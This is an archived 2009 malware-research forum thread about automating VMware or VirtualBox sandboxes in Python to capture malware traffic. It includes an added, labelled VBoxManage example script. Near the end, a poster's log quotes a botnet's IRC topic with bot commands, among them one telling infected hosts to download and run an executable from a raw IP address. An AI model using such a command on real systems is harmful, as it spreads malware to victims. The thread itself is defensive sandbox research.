Malware Domain List
Malware Related => Tools of the trade / Internet News => Topic started by: log0 on August 09, 2009, 12:02:56 pm
-
Hi all gurus,
Could use some help and directions.
I have Windows in VMware that I want to control from my VM Host to start/stop/revert/run programs. I am aiming to build an automated, simplified but specialized malware sandbox to extract pcap files (yadayada... anubis is too slow). However, Pyvix doesn't seem to have been updated for 3 years already, and it isn't just the compilation issue (it seems) but mismatching binaries, and so on.
My questions :
1. If I want to script VMware workstation in Python, what are the solutions out there?
2. What are the usual solutions as used by you experts in industries and focused academics?
Thank you.
Log0
-
You have to install VMWARE VIX API first.
http://www.vmware.com/support/developer/vix-api/
This API provides bindings for C, Perl, and COM (Visual Basic, VBscript, C#).
VMWARE doesn't provide bindings for Python, but there are Python bindings.
Look here:
http://groups.google.com/group/vmkernelnewbies/browse_thread/thread/b910fe85b1eebcb2
I haven't used the python bindings, so I don't know how well it works.
-
Hi SysAdMini,
Yes I have installed the ViX. =)
Here is the extract I obtained from pyvix, it looks oooooooooooooooold !!!!!!
pyvix-2006.07.18-source.zip 32.2 KiB Tue Jul 18 2006 14:44 939
So, I'm just curious if it's a "declared dead" library?
===
BTW, so most people still use the C interface of ViX ( perhaps Perl? ) to automate only?
-
Aha, that new updated code works better... got some new errors, but there goes the progress. Thanks SysAdMini. =)
-
Didn't really mean to bug... anyone got this error?
I found this is a pretty common unanswered problem ... not any solutions I got ...
VIX_E_WRAPPER_SERVICEPROVIDER_NOT_FOUND = 22003
pyvix.vix.VIXException: The system returned an error. Communication with the virtual machine may have been interrupted
I used the powerOn.c helloworld code provided by Vmware. Anyway..it fails at connect.
I'll continue to work on it and see what's going to come back... but if anyone has met this, please kindly offer advice.
I really need to post an article on this common problem after I've solved it. =)
Thank you very much.
-
Yayayaya, I abandoned vmware and picked up (free) virtualbox. Somehow the installation of ViX didn't work quite well, but why bother fixing it when there's an easier way. Waste no time.
There goes vboxmanage, which does it in a simpler way.
For those interested, I'm building an automated tool for infiltrating botnets... let's see what comes out.
Thanks.
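-
An added example, not part of the original thread or any poster's code: one revert / capture / power-off cycle of the kind discussed above, driven through VBoxManage from Python. The VM name, snapshot name and pcap path passed in are placeholders, and it assumes the snapshot was taken with the guest powered off and that the guest launches the sample itself after boot.

```python
import subprocess
import time

def _run(cmd):
    """Run one VBoxManage command and return its stdout; raises on failure."""
    return subprocess.run(cmd, check=True, capture_output=True, text=True).stdout

def vm_state(showvminfo_output):
    """Extract VMState from `showvminfo --machinereadable` output."""
    for line in showvminfo_output.splitlines():
        key, _, value = line.partition("=")
        if key == "VMState":
            return value.strip('"')
    return "unknown"

def sandbox_cycle(vm, snapshot, pcap_path, seconds, run=_run, sleep=time.sleep):
    """One revert / capture / power-off cycle; returns the commands issued."""
    issued = []

    def vbox(*args):
        cmd = ["VBoxManage", *args]
        issued.append(cmd)
        return run(cmd)

    # A guest left running by a failed earlier cycle blocks the restore.
    if vm_state(vbox("showvminfo", vm, "--machinereadable")) in ("running", "paused"):
        vbox("controlvm", vm, "poweroff")
    vbox("snapshot", vm, "restore", snapshot)
    # Set tracing after the restore: restoring also brings back the
    # snapshot's VM settings, which would undo an earlier modifyvm.
    vbox("modifyvm", vm, "--nictrace1", "on", "--nictracefile1", pcap_path)
    vbox("startvm", vm, "--type", "headless")
    try:
        sleep(seconds)  # observation window while the sample runs
    finally:
        # Always stop the guest so an infected VM is never left on the network.
        vbox("controlvm", vm, "poweroff")
    return issued
```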
-
Look forward to seeing the results :) (looking into setting up automated analysis myself too)
-
I tested virtualbox a few months ago. I was unable to set up a network bridge to my wireless lan adapter.
I'm wondering if it works in the current virtualbox version. If yes, then I would give it a second chance.
-
>>SysAdMini
oops... a lil busy and then workin' then.
Didn't try bridge wireless before, top two from google :
http://ubuntuforums.org/showthread.php?t=724783h
http://forums.virtualbox.org/viewtopic.php?t=1787
Any luck?
I basically have a tool that can grep traffic for myself, now need to piece up a bot and everything altogether.
===
>> MysteryFCM
Sure, it is just a few pieces of spread out technology pieced together... I guess a lot of ppl in MDL alrdy got them?
-
I guess most of these are basic tools to most ppl...everyone gotta build their own guns!
The malware caught - 6/41 ( 14.63 % ) ouch.
Basic
2009-08-23 18:27:20,644 - log-6 - INFO - Received : [:irc.efnet.com 332 [ #xx6 :.flushdns |.down -S |.update -S |.update http://94.76.194.116/xx8.exe x5s5g6q3x1n3.exe x5s5g6q3x1n3]
...
but sadly, still doing it wrong. =)
2009-08-23 18:27:23,560 - log-6 - INFO - Received : [ERROR :Closing Link: [[<my ip>] (Client hat die Verbindung getrennt)]
German stuffs.
Workin' workin' ...